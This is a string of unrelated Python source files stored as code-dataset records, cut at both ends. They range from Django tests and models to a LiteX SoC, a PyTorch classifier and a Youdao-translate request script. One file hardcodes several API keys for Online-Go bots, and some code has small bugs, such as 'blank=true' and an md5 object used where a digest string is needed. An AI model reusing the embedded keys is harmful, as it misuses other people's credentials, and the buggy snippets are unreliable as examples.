Window(self.graphics)\r\n print(\"window\")\r\n self.window.create(self.width, self.height, b\"BunnyMark\")\r\n self.window_listener = Listener(self.event)\r\n self.window_listener.create(EVENT_TYPE_WINDOW, self.on_window_event)\r\n print(\"done\")\r\n \r\n def quit(self):\r\n super().quit()\r\n\r\n def on_window_event(self, event_data):\r\n print(\"on window event\")\r\n if event_data[\"sub_type\"] == WINDOW_EVENT_TYPE_CLOSE:\r\n self.quit()\r\n\r\nif __name__ == \"__main__\":\r\n game = Game()\r\n game.run()","sub_path":"examples/data_test.py","file_name":"data_test.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"649829545","text":"\n\"\"\"\nContact Form tests\n\"\"\"\nimport mock\n\nfrom django import test\nfrom django.core.urlresolvers import reverse\nfrom django.template import loader, TemplateDoesNotExist\n\nfrom contact_form import forms, views\n\n\n\nclass AcceptanceTestsContactCompletedPage(test.TestCase):\n\n def test_receives_200_status_code_for_completed_page(self):\n response = self.client.get(reverse(\"contact_form:completed\"))\n self.assertEqual(200, response.status_code)\n\n def test_uses_completed_template_when_rendering_page(self):\n response = self.client.get(reverse(\"contact_form:completed\"))\n self.assertTemplateUsed(response, views.CompletedPage.template_name)\n\n\nclass BaseEmailFormMixinTests(test.TestCase):\n\n @mock.patch('django.template.loader.render_to_string')\n def test_get_message_returns_rendered_message_template(self, render_to_string):\n context = {'message': 'an example message.'}\n\n class TestForm(forms.BaseEmailFormMixin):\n message_template_name = \"my_template.html\"\n def get_context(self):\n return context\n\n form = TestForm()\n\n message = form.get_message()\n self.assertEqual(render_to_string.return_value, message)\n render_to_string.assert_called_once_with(form.message_template_name, context)\n\n @mock.patch('django.template.loader.render_to_string')\n def test_get_subject_returns_single_line_rendered_subject_template(self, render_to_string):\n render_to_string.return_value = 'This is \\na \\ntemplate.'\n context = {'message': 'an example message.'}\n\n class TestForm(forms.BaseEmailFormMixin):\n subject_template_name = \"my_template.html\"\n def get_context(self):\n return context\n\n form = TestForm()\n\n subject = form.get_subject()\n self.assertEqual('This is a template.', subject)\n render_to_string.assert_called_once_with(form.subject_template_name, context)\n\n def test_get_context_returns_cleaned_data_when_form_is_valid(self):\n class TestForm(forms.BaseEmailFormMixin, forms.forms.Form):\n name = forms.forms.CharField()\n\n form = TestForm(data={'name': 'test'})\n self.assertEqual(dict(name='test'), form.get_context())\n\n def test_get_context_returns_value_error_when_form_is_invalid(self):\n class TestForm(forms.BaseEmailFormMixin, forms.forms.Form):\n name = forms.forms.CharField()\n\n form = TestForm(data={})\n with self.assertRaises(ValueError) as ctx:\n form.get_context()\n self.assertEqual(\"Cannot generate Context when form is invalid.\", ctx.exception.message)\n\n @mock.patch(\"contact_form.forms.EmailMessage\")\n @mock.patch(\"contact_form.forms.BaseEmailFormMixin.get_message_dict\")\n def test_sends_mail_with_message_dict(self, get_message_dict, email_class):\n mock_request = test.RequestFactory().get('/')\n get_message_dict.return_value = {\"name\": \"aaron\"}\n\n form = forms.BaseEmailFormMixin()\n form.send_email(mock_request)\n\n email_class.assert_called_once_with(**get_message_dict.return_value)\n email_class.return_value.send.assert_called_once_with(fail_silently=False)\n\n @mock.patch(\"contact_form.forms.BaseEmailFormMixin.get_subject\")\n @mock.patch(\"contact_form.forms.BaseEmailFormMixin.get_message\")\n def test_gets_message_dict(self, get_message, get_subject):\n form = forms.BaseEmailFormMixin()\n message_dict = form.get_message_dict()\n\n self.assertEqual({\n \"from_email\": form.from_email,\n \"to\": form.recipient_list,\n \"body\": get_message.return_value,\n \"subject\": get_subject.return_value,\n }, message_dict)\n\n\nclass ContactFormTests(test.TestCase):\n\n def test_is_subclass_of_form_and_base_contact_form_mixin(self):\n self.assertTrue(issubclass(forms.ContactForm, forms.BaseEmailFormMixin))\n self.assertTrue(issubclass(forms.ContactForm, forms.forms.Form))\n\n def test_has_valid_subject_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactForm.subject_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Subject template does not exist\")\n\n def test_has_valid_message_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactForm.message_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Email message template does not exist\")\n\n\nclass ContactModelFormTests(test.TestCase):\n\n def test_is_subclass_of_model_form_and_base_contact_form_mixin(self):\n self.assertTrue(issubclass(forms.ContactModelForm, forms.BaseEmailFormMixin))\n self.assertTrue(issubclass(forms.ContactModelForm, forms.forms.ModelForm))\n\n def test_has_valid_subject_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactModelForm.subject_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Subject template does not exist\")\n\n def test_has_valid_message_template(self):\n template_exists = 1\n try:\n loader.render_to_string(forms.ContactModelForm.message_template_name)\n except TemplateDoesNotExist:\n template_exists = 0\n self.assertTrue(template_exists, \"Email message template does not exist\")\n","sub_path":"contact_form/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"644388744","text":"def interpolation_search(arr, x):\n low = 0\n high = len(arr) - 1\n while low <= high and x >= arr[low] and x <= arr[high]:\n if low == high:\n if arr[low] == x:\n return low\n return -1\n pos = low + int(((float(high - low) / (arr[high] - arr[low])) * (x - arr[low])))\n if arr[pos] == x:\n return pos\n if arr[pos] < x:\n low = pos + 1\n else:\n high = pos - 1\n return -1\n\n\nif __name__ == '__main__':\n arr = [12, 11, 13, 5, 6, 7]\n x = 11\n result = interpolation_search(arr, x)\n if result != -1:\n print(\"Element is present at index\", str(result))\n else:\n print(\"Element is not present in array\")\n","sub_path":"Python/InterpolationSearch.py","file_name":"InterpolationSearch.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"530435039","text":"from plynx.constants import Collections\nfrom plynx.db.db_object import DBObject, DBObjectField\nfrom plynx.db.node import Node\nfrom plynx.utils.db_connector import get_db_connector\nfrom plynx.utils.common import ObjectId\n\n\nclass WorkerState(DBObject):\n \"\"\"Status of the worker\"\"\"\n FIELDS = {\n '_id': DBObjectField(\n type=ObjectId,\n default=ObjectId,\n is_list=False,\n ),\n 'worker_id': DBObjectField(\n type=str,\n default=None,\n is_list=False,\n ),\n 'graph_id': DBObjectField(\n type=ObjectId,\n default=None,\n is_list=False,\n ),\n 'node': DBObjectField(\n type=Node,\n default=None,\n is_list=False,\n ),\n 'host': DBObjectField(\n type=str,\n default='',\n is_list=False,\n ),\n 'num_finished_jobs': DBObjectField(\n type=int,\n default=0,\n is_list=False,\n ),\n }\n\n\nclass MasterState(DBObject):\n \"\"\"Master statistics snapshot.\"\"\"\n\n FIELDS = {\n '_id': DBObjectField(\n type=ObjectId,\n default=ObjectId,\n is_list=False,\n ),\n 'workers': DBObjectField(\n type=WorkerState,\n default=list,\n is_list=True,\n ),\n }\n\n DB_COLLECTION = Collections.MASTER_STATE\n\n\ndef get_master_state():\n states = getattr(get_db_connector(), MasterState.DB_COLLECTION)\\\n .find({}).sort('insertion_date', -1).limit(1)\n return states[0] if states.count() > 0 else None\n","sub_path":"plynx/db/service_state.py","file_name":"service_state.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"471702446","text":"from os.path import abspath, join, dirname\r\nfrom random import random\r\n\r\n\r\ndef file_path(name: str, prefix=\"\"):\r\n if prefix:\r\n return abspath(join(dirname(__file__), 'data', prefix, name))\r\n return abspath(join(dirname(__file__), 'data', name))\r\n\r\n\r\ndef shrink_file(name: str, factor=100):\r\n if factor <= 1 or type(factor) != int:\r\n raise ValueError(\"factor must be greater than 1 and be an integer\")\r\n\r\n if '.' in name and '/' in name:\r\n folder, file = name.split('/')\r\n file, ext = name.split('.')\r\n new_name = '%s/%s.%s' % (folder, file + '-s', ext)\r\n elif '.' in name:\r\n file, ext = name.split('.')\r\n new_name = '%s.%s' % (file + '-s', ext)\r\n elif '/' in name:\r\n folder, file = name.split('/')\r\n new_name = '%s/%s' % (folder, file + '-s')\r\n else:\r\n new_name = name + '-s'\r\n\r\n with open(file_path(name)) as inp, open(file_path(new_name), 'w+') as out:\r\n\r\n print(\"Shrinking file\")\r\n for line in inp:\r\n if random() < 1 / factor:\r\n out.write(line)\r\n\r\n print(\"Done\")\r\n\r\n\r\nif __name__ == '__main__':\r\n shrink_file('audioscrobbler/user_artist_data', 500)\r\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"227874846","text":"class Solution:\n def minPathSum(self, grid):\n rows, cols = len(grid), len(grid[0])\n dp = [0] * cols\n for i in range(rows):\n dp[0] += grid[i][0]\n for j in range(1, cols):\n dp[j] = (dp[j - 1] if i == 0 else min(dp[j], dp[j - 1])) + grid[i][j]\n\n return dp[cols - 1]\n\nsol = Solution()\nassert sol.minPathSum([[1, 3, 1], [1, 5, 1], [4, 2, 1]]) == 7\n","sub_path":"competitiveprogramming-python/src/com/mounacheikhna/leetcode/medium/64. Minimum Path Sum.py","file_name":"64. Minimum Path Sum.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"159626474","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('registerFamily', views.register_family),\n path('login', views.login),\n path('addUpdateUser', views.update_user),\n path('getUserList', views.get_user_list),\n path('getGeofenceList', views.get_geofence_list),\n path('getHistoryList', views.get_history_list),\n path('getLastKnownList', views.get_last_known_list),\n path('addUpdateGeofence', views.update_geofence),\n path('uploadLocation', views.upload_location),\n path('uploadGeofence', views.upload_geofence)\n]","sub_path":"project/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"329646153","text":"gtp2ogs_standard_args = {'ggshost':\"ggs.online-go.com\",\n 'resthost':\"online-go.com\"}\n\nBilly = {'apikey':\"cbc2817b88c24a2bb777a0a80e29cd5b937eaa38\",\n 'botid':\"Billy (GnuGo lvl10)\",\n 'command':'gnugo',\n 'command-args':['--mode', 'gtp']}\n\nJiffy = {'apikey':'e85a77fb0a7f7a927c881156229b1ff95feebb3b',\n 'botid':\"Jiffy (Pachi)\", \n 'command':'pachi',\n 'command-args':['-f', '/home/crodgers/fuego-1.1/book.dat', 'max_tree_size=512']}\n\nNatsu = {'apikey':'afa24b7b2153bc0d4f98ae6092b8726b4dc246ee',\n 'botid':\"Natsu (Fuego)\",\n 'command':'fuego',\n 'command-args':[]}\n\nGruffy = {'apikey':\"68504661564f2f67a7799a2dcdcddb35a6b02b69\",\n 'botid':\"TheKid (GnuGo)\",\n 'command':'/home/crodgers/oldGNUGO/gnugo-3.4/interface/gnugo',\n 'command-args':['--mode', 'gtp', '--level', '1']}\n\nNanny = {'apikey':\"e2310a7162033047b15a2b57247b24368633eed6\",\n 'botid':\"Nanny (GnuGo lvl5)\",\n 'command':'gnugo',\n 'command-args':['--mode', 'gtp', '--level', '1']}\n\nbots = (Billy, Jiffy, Natsu)\n","sub_path":"bot_locals.py","file_name":"bot_locals.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"421533860","text":"#!/usr/bin/env python3\n\nimport os\n\nfrom migen import *\n\nfrom litex.soc.interconnect import wishbone\nfrom litex.soc.integration.soc_core import mem_decoder\n\nfrom litex.soc.cores.spi_flash import SpiFlash\n\nfrom periphs.misc import *\nfrom periphs.accel import *\n\n# SoCAE4GX -----------------------------------------------------------------------------------------\n\ndef SoCAE4GX(soc_cls, **kwargs):\n class _SoCLinux(soc_cls):\n soc_cls.csr_map.update({\n \"ctrl\": 0,\n \"uart\": 2,\n \"timer0\": 3,\n })\n soc_cls.interrupt_map.update({\n \"uart\": 3,\n \"timer0\": 4,\n })\n soc_cls.mem_map = {\n \"rom\": 0x00000000,\n \"sram\": 0x10000000,\n \"csr\": 0xf0000000,\n }\n\n def __init__(self, **kwargs):\n soc_cls.__init__(self, cpu_type=\"vexriscv\", cpu_variant=\"lite\", **kwargs)\n\n # Integrate SPI master\n self.submodules.spi_master = spi_master = SpiMaster(self.platform.request(\"spi\", 0))\n self.add_csr(\"spi_master\", 10, allow_user_defined=True)\n self.add_interrupt(\"spi_master\", 6, allow_user_defined=True)\n self.register_mem(\"spi_master\", 0x30000000, spi_master.bus, 32)\n spi_master.add_source(self.platform)\n\n # Custom accel simulator IP core\n self.submodules.accel = accel = AccelCore(freq=100000000, baud=115200, pads=self.platform.request(\"spi_slave\", 0))\n self.add_csr(\"accel\", 11, allow_user_defined=True)\n self.add_interrupt(\"accel\", 7, allow_user_defined=True)\n\n return _SoCLinux(**kwargs)\n","sub_path":"soc_ae4gx.py","file_name":"soc_ae4gx.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"137196269","text":"\n\n\n\n\n\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\nimport csv \nimport re \nimport os \n\n\nimport matchzoo as mz\nprint(mz.__version__)\n\ntask = mz.tasks.Ranking()\nprint(task)\n\n\nimport pandas as pd\nbdf=pd.read_csv('example.csv') #This will be predefined in the user input any csv\n\n\n\ndef inputs(bdf,i):\n s=(bdf.iloc[i]['ttxt'])\n fs= open(\"temp.txt\",\"w+\")\n fs.write(s)\n fs=open('temp.txt',\"r+\")\n rd=fs.read()\n cleaned=clean(rd)\n return cleaned\n #text_file = open(\"sample.txt\", \"wt\")\n #n = text_file.write(s)\n\n\n\ndef clean(btxt): \n import re, string\n #txt= open(\"uH3h7NAk.txt\", \"r+\")\n #txt= open(fname, \"r+\")\n #txt=txt.read()#Reading\n txt=btxt\n print(txt)\n txt=str(txt.encode(encoding = 'UTF-8',errors = 'strict')) #UTF-8 Encoding\n clean = re.sub(r\"[0-9,.;@#?/&%\"\",(),[],!&$]+\\ *\", \" \", txt.replace('b','')) #Removes unncessary stuff for word vectors\n print(clean)\n s=clean\n exclude = set(string.punctuation)\n table = str.maketrans(\"\",\"\")\n regex = re.compile('[%s]' % re.escape(string.punctuation)) #Punctuations\n text= regex.sub('', s)\n import nltk\n #nltk.download('stopwords')\n from nltk.corpus import stopwords #Stop Words influencing the game\n cachedStopWords = stopwords.words(\"english\")\n text = ' '.join([word for word in text.split() if word not in cachedStopWords]).lower()\n return text\n\n\n#Sends the dataframe here and parses for each documnet contained in iloc[0,1,2....n]\nfor i in range(len(bdf)):\n res=inputs(bdf,i)\n print(res)\n\n\n\n\n\n\n\ntrain_raw = mz.datasets.toy.load_data(stage='train', task=task)\ntest_raw = mz.datasets.toy.load_data(stage='test', task=task)\n\n\ntype(train_raw)\n\ntrain_raw.left.head()\n\ntrain_raw.right.head()\n\ntrain_raw.relation.head()\n\ntrain_raw.frame().head()\n\npreprocessor = mz.preprocessors.BasicPreprocessor()\n\npreprocessor.fit(train_raw)\n\npreprocessor.context\n\n\ntrain_processed = preprocessor.transform(train_raw)\ntest_processed = preprocessor.transform(test_raw)\n\n\ntrain_processed.left.head()\n\n\n\nvocab_unit = preprocessor.context['vocab_unit']\nprint('Orig Text:', train_processed.left.loc['Q1']['text_left'])\nsequence = train_processed.left.loc['Q1']['text_left']\nprint('Transformed Indices:', sequence)\nprint('Transformed Indices Meaning:',\n '_'.join([vocab_unit.state['index_term'][i] for i in sequence]))\n\n\n\nmz.models.list_available()\n\n\nmodel =mz.models.DenseBaseline()\n\n\nmodel.params['mlp_num_layers'] =3\nmodel.params['mlp_num_units'] = 300\nmodel.params['mlp_num_fan_out'] = 128\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.guess_and_fill_missing_params(verbose=0)\n \n\n\nprint(model.params)\n\nmodel.params.to_frame()[['Name', 'Description', 'Value']]\n\nmodel.params['task'] = task\nmodel.params['mlp_num_units'] = 5\nprint(model.params)\n\n\nmodel.params.update(preprocessor.context)\n\n\n\nmodel.params.completed()\n\n\n\nmodel.build()\nmodel.compile()\n\n\nmodel.backend.summary()\n\n\n\n\nx, y = train_processed.unpack()\ntest_x, test_y = test_processed.unpack()\n\nmodel.fit(x, y, batch_size=32, epochs=800)\n\n\n\ndata_generator = mz.DataGenerator(train_processed, batch_size=32)\n\n\nmodel.fit_generator(data_generator, epochs=5, use_multiprocessing=True, workers=4)\n\n\n\n\n\nmodel.evaluate(test_x, test_y)\n\nmodel.predict(test_x)\n\n\nprint(np.array(test_x))\n\n\nscaler = StandardScaler()\nprint(scaler.fit(test_x))\n\n\nmodel.save('my-model')\n","sub_path":"DSSM/test_runs/run_tests1.py","file_name":"run_tests1.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"39513085","text":"#!/usr/bin/env python\n#\n# Copyright 2012, Rackspace US, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport flask\n\nfrom opencenter.db.api import api_from_models\nfrom opencenter.db import exceptions\nfrom opencenter.webapp import generic\n# from opencenter.webapp import solver\n# from opencenter.webapp import utility\n\n\nobject_type = 'adventures'\nbp = flask.Blueprint(object_type, __name__)\n\n\n@bp.route('/', methods=['GET', 'POST'])\ndef list():\n return generic.list(object_type)\n\n\n@bp.route('/', methods=['GET', 'PUT', 'DELETE'])\ndef by_id(object_id):\n return generic.object_by_id(object_type, object_id)\n\n\n@bp.route('//execute', methods=['POST'])\ndef execute_adventure(adventure_id):\n data = flask.request.json\n\n if not 'node' in data:\n return generic.http_badrequest(msg='node not specified')\n\n api = api_from_models()\n try:\n adventure = api._model_get_by_id('adventures', int(adventure_id))\n except exceptions.IdNotFound:\n message = 'Not Found: Adventure %s' % adventure_id\n return generic.http_notfound(msg=message)\n\n try:\n return generic.http_solver_request(data['node'], [],\n api=api, plan=adventure['dsl'])\n except exceptions.IdNotFound:\n #Can IdNotFound be raised for any other reason?\n return generic.http_notfound(msg='Not Found: Node %s' % data['node'])\n","sub_path":"opencenter/webapp/adventures.py","file_name":"adventures.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"363697243","text":"from django.db import models\n\n\nARTICLE_CATEGORY_CHOICE = (\n (1, \"故事\"),\n (2, \"課程\"),\n (3, \"學習資源\")\n)\n\n\nclass Article(models.Model):\n title = models.TextField(blank=False, default=\"文章\")\n category = models.SmallIntegerField(\n default=1, choices=ARTICLE_CATEGORY_CHOICE)\n content = models.TextField(blank=true, default=\"文章\")\n img = models.URLField(\n blank=False, default=\"https://i.imgur.com/67A5cyq.jpg\")\n url = models.URLField(\n blank=False, default=\"https://i.imgur.com/67A5cyq.jpg\")\n","sub_path":"IMnight/sky/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"99148790","text":"# 1.\n# 编写程序,将字典中的键与值互换。\nd = {1: \"one\", 2: \"two\"}\n# 字典创建的方式{键:值,}\n# 对字典进行追加元素\n# 字典[key]=value\nd_new={}\nprint(len(d_new))\nfor k,v in d.items():\n d_new[v]=k\nprint(d_new)\n\n\n\n\n#\n# 2.\n# 元组是否可以总是可以作为字典的键值?\n# 元组的元素只有不可变类型时,可以作为字典的key\n# 如果包含可变类型,则不能作为字典的key\nt=(1,2,3)\n# t=(1,2,3,[4])\nx={t:\"dddd\"}\nprint(x,type(x))\n\n#\n#\n# 3.\n# 现在有一个列表list = [1, 2, 5, 4, 1, 5, 6, 8, 0, 2],\n# 希望去除重复元素,\n# 使用set和不使用set两种方式\nlist1 = [1, 2, 5, 4, 1, 5, 6, 8, 0, 2]\nprint(list1)\nprint(list(set(list1)))\n# list1.sort(key=)\ntemp=[]\nfor x in list1:\n if x not in temp:\n temp.append(x)\nprint(temp)\n#\n# 4.\n# 字典中存储了学生成绩\n# 如果要把字典中元素变成有序,习惯上将字典中元素转换成元组(key,value),\n# 将整个字典变成列表,最终的结果建议仍然使用元组存储。\n\n# {\"tom\": 100, \"kate\": 90, \"jerry\": 95},分别实现按照学生名字和按照成绩排序\nd={\"tom\": 100, \"kate\": 90, \"jerry\": 95, \"lily\": 95}\nprint(sorted(d))\nt1=[]\nt2=[]\nfor k,v in d.items():\n # t1+=((k,v))\n t1.append((k,v))\n t2.append((v,k))\nprint(t1)\nprint(('jerry', 95)<('tom', 100))\nt1.sort()\nprint(tuple(t1))\nt2.sort()\nprint(t2)\n\n","sub_path":"python1808/day9/day8homework.py","file_name":"day8homework.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"326515044","text":"import os\n\nf = open(\"day1input.txt\")\nvalues =[]\nfor value in f:\n values.append(int(value))\n \ntotal = 0\nPastTotals=[]\nflag = False\n\nwhile flag == False:\n for value in values:\n total += value\n if total in PastTotals:\n print(total)\n flag = True\n else:\n PastTotals.append(total)\n \n\n\n\n ","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"261406473","text":"import os\nimport time\nimport copy\nimport torch\nimport argparse\nimport torch.utils.data as data\nfrom torch import (nn,optim,autograd,cuda)\nfrom torchvision import datasets,models,transforms\n\n\ndef get_args():\n\n parser = argparse.ArgumentParser(description='test_some_ex')\n parser.add_argument('--load',type=bool,default=False)\n parser.add_argument('--epochs',type=int,default=32,help='amount of epochs')\n parser.add_argument('--batch_size',type=int,default=64,help='amount of batch size')\n parser.add_argument('--cuda',type=int,default=0,help='cuda device ID')\n parser.add_argument('--lr',type=float,default=.001,help='learning rate')\n parser.add_argument('--momentum',type=float,default=.09,help='momentum')\n parser.add_argument('--weight_decay',type=float,default=0.1,help='weight_decay')\n parser.print_help()\n args = parser.parse_args()\n return args\n\nargs = get_args()\nprint(f'epochs : {args.epochs}\\n'\n f'batch_size : {args.batch_size}\\n'\n f'lr : {args.lr}\\n')\n\ntorch.cuda.set_device(args.cuda)\n\ndata_DIR = 'damage_car_data'\nweight = \"CDD_model.pth\"\nweight_x2 = \"CDD_model_x2.pth\"\n\n# data_DIR = 'Damage-Car-Data-small'\ndata_trans = {\n 'train_set' : transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n]),\n 'valid_set' : transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])}\n\ntest_trans = {'test_set' : transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])}\ncar_datasets = { x : datasets.ImageFolder(os.path.join(data_DIR,x),data_trans[x])\n for x in data_trans.keys()}\ndata_loaders = {x : data.DataLoader(dataset=car_datasets[x],batch_size=args.batch_size,shuffle=True,num_workers=4)\n for x in data_trans.keys()}\n\nphase = 'test_set'\ntest_dataset = {phase : datasets.ImageFolder(os.path.join(data_DIR, phase), test_trans[phase])}\ntest_loader = {phase : data.DataLoader(dataset=test_dataset[phase],\n batch_size=args.batch_size,\n shuffle=True, num_workers=4)}\ntest_data_size = len(test_dataset[phase])\n\n\ndata_sizes = {x : len(car_datasets[x]) for x in data_trans.keys()}\n\nclass_names = car_datasets['train_set'].classes\n\nprint(f'data_sizes {data_sizes}'\n f'names : {class_names}')\n\nmodel_ft = models.resnet34(pretrained=True)\n\nif cuda.is_available():\n model_ft = models.resnet34(pretrained=True).cuda()\n\n\nmodel_ft.fc = nn.Linear(model_ft.fc.in_features,2)\nif cuda.is_available():\n model_ft.fc = nn.Linear(model_ft.fc.in_features,2).cuda()\n\n\ncriterion = nn.CrossEntropyLoss()\nif cuda.is_available():\n criterion = nn.CrossEntropyLoss().cuda()\n\n# optimzier_ft = optim.Adam(params=model_ft.parameters(),lr=args.lr)\noptimzier_ft = optim.SGD(params=model_ft.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n nesterov=True)\n\nexp_lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimzier_ft,mode='min')\n\ndef train_model_tf(\n model=model_ft,\n optimizer=optimzier_ft,\n scheduler=exp_lr_scheduler,\n epochs=args.epochs):\n\n timestamp_st = time.time()\n best_model_weights = copy.deepcopy(model.state_dict())\n best_accuracy = 0\n for epoch in range(epochs):\n print(f'epoch {epoch+1}/{epochs}')\n print('-'*50)\n\n for phase in data_trans.keys():\n\n data_size = data_sizes[phase]\n if phase == 'train_set' :\n # scheduler.step()\n model.train(True)\n else:\n model.train(False)\n\n running_loss = 0.0\n running_corrects = 0.0\n\n for data in data_loaders[phase]:\n\n inps,labs = data\n inps,labs = autograd.Variable(inps),autograd.Variable(labs)\n\n if cuda.is_available():\n inps,labs = autograd.Variable(inps).cuda(),autograd.Variable(labs).cuda()\n\n\n optimizer.zero_grad()\n\n outs = model(inps)\n _,preds = torch.max(outs.data,1)\n loss = criterion(outs,labs)\n\n if phase == 'train_set' :\n loss.backward()\n optimizer.step()\n\n running_loss += loss.data[0] * inps.size(0)\n running_corrects += torch.sum(preds == labs.data)\n\n if phase == 'valid_set':\n scheduler.step(running_loss)\n\n print(f'{phase} running Loss : {running_loss:.4f} running_corrects {running_corrects:.4f}')\n epoch_loss = running_loss / data_size\n epoch_accuracy = float(running_corrects) / data_size\n\n print(f'{phase} Loss : {epoch_loss:.4f} Acc {epoch_accuracy:.4f}')\n\n if phase =='valid_set' and epoch_accuracy > best_accuracy :\n\n best_accuracy = epoch_accuracy\n best_model_weights = copy.deepcopy(model.state_dict())\n\n print()\n time_elapsed = time.time() - timestamp_st\n print(f'Training complete in {time_elapsed//60:.0f}m {time_elapsed % 60 :.0f}s \\n'\n f'Best value Accuracy in valid set : {best_accuracy:.4f}')\n\n model.load_state_dict(best_model_weights)\n return model\n\nif args.load :\n model_ft = train_model_tf()\n torch.save(model_ft.state_dict(),\"CDD_model.pth\")\nelse:\n model = models.resnet34(False).cuda()\n checkpoint = torch.load(\"CDD_model.pth\")\n model.fc = nn.Linear(model.fc.in_features, 2).cuda()\n model.load_state_dict(checkpoint)\n model.train(False)\n model.eval()\n print('-' * 50)\n\n running_loss = 0.0\n running_corrects = 0.0\n\n for data in test_loader[phase]:\n inps, labs = data\n inps, labs = torch.autograd.Variable(inps), torch.autograd.Variable(labs)\n\n if cuda.is_available():\n inps, labs = torch.autograd.Variable(inps).cuda(), torch.autograd.Variable(labs).cuda()\n\n outs = model(inps)\n _, preds = torch.max(outs.data, 1)\n loss = criterion(outs, labs)\n\n running_loss += loss.data[0] * inps.size(0)\n running_corrects += torch.sum(preds == labs.data)\n\n print(f'{phase} running Loss : {running_loss:.4f} running_corrects {running_corrects:.4f}')\n print()\n test_loss = running_loss / test_data_size\n test_acc = float(running_corrects) / test_data_size\n print(f'{phase} Loss : {test_loss:.4f} Acc {test_acc:.4f}')\n\n model = train_model_tf(model=model)\n torch.save(model.state_dict(),\"CDD_model_x2.pth\")\n\n\n\n\n\n","sub_path":"Car-Damage-Detector.py","file_name":"Car-Damage-Detector.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289255445","text":"# -*- coding:utf-8 -*-\nimport json\nimport time\nimport random\nimport hashlib\nimport urllib\nimport urllib2\n\ndef send_request():\n # js解密算法数据\n r = str(int(time.time() * 1000) + random.randint(0, 10))\n D = \"ebSeFb%=XZ%T[KZ)c(sy!\"\n S = \"fanyideskweb\"\n n = raw_input(\"请输入需要翻译的文字:\")\n sign = hashlib.md5(r + D + S + n)\n\n form_data = {\n \"i\": n,\n \"from\": \"AUTO\",\n \"to\": \"AUTO\",\n \"smartresult\": \"dict\",\n \"client\": \"fanyideskweb\",\n \"salt\": r,\n \"sign\": sign,\n \"doctype\": \"json\",\n \"version\": \"2.1\",\n \"keyfrom\": \"fanyi.web\",\n \"action\": \"FY_BY_CLICKBUTTION\",\n \"typoResult\": \"false\"\n }\n data = urllib.urlencode(form_data)\n base_url = \"http://fanyi.youdao.com/translate_o?smartresult=dict&smartresult=rule\"\n headers = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n # \"Accept-Encoding\" : \"gzip, deflate\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\n \"Connection\": \"keep-alive\",\n # \"Content-Length\": \"218\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"Cookie\": \"_ntes_nnid=f77d53cb936304b5333b304b767a4958,1506087321856; 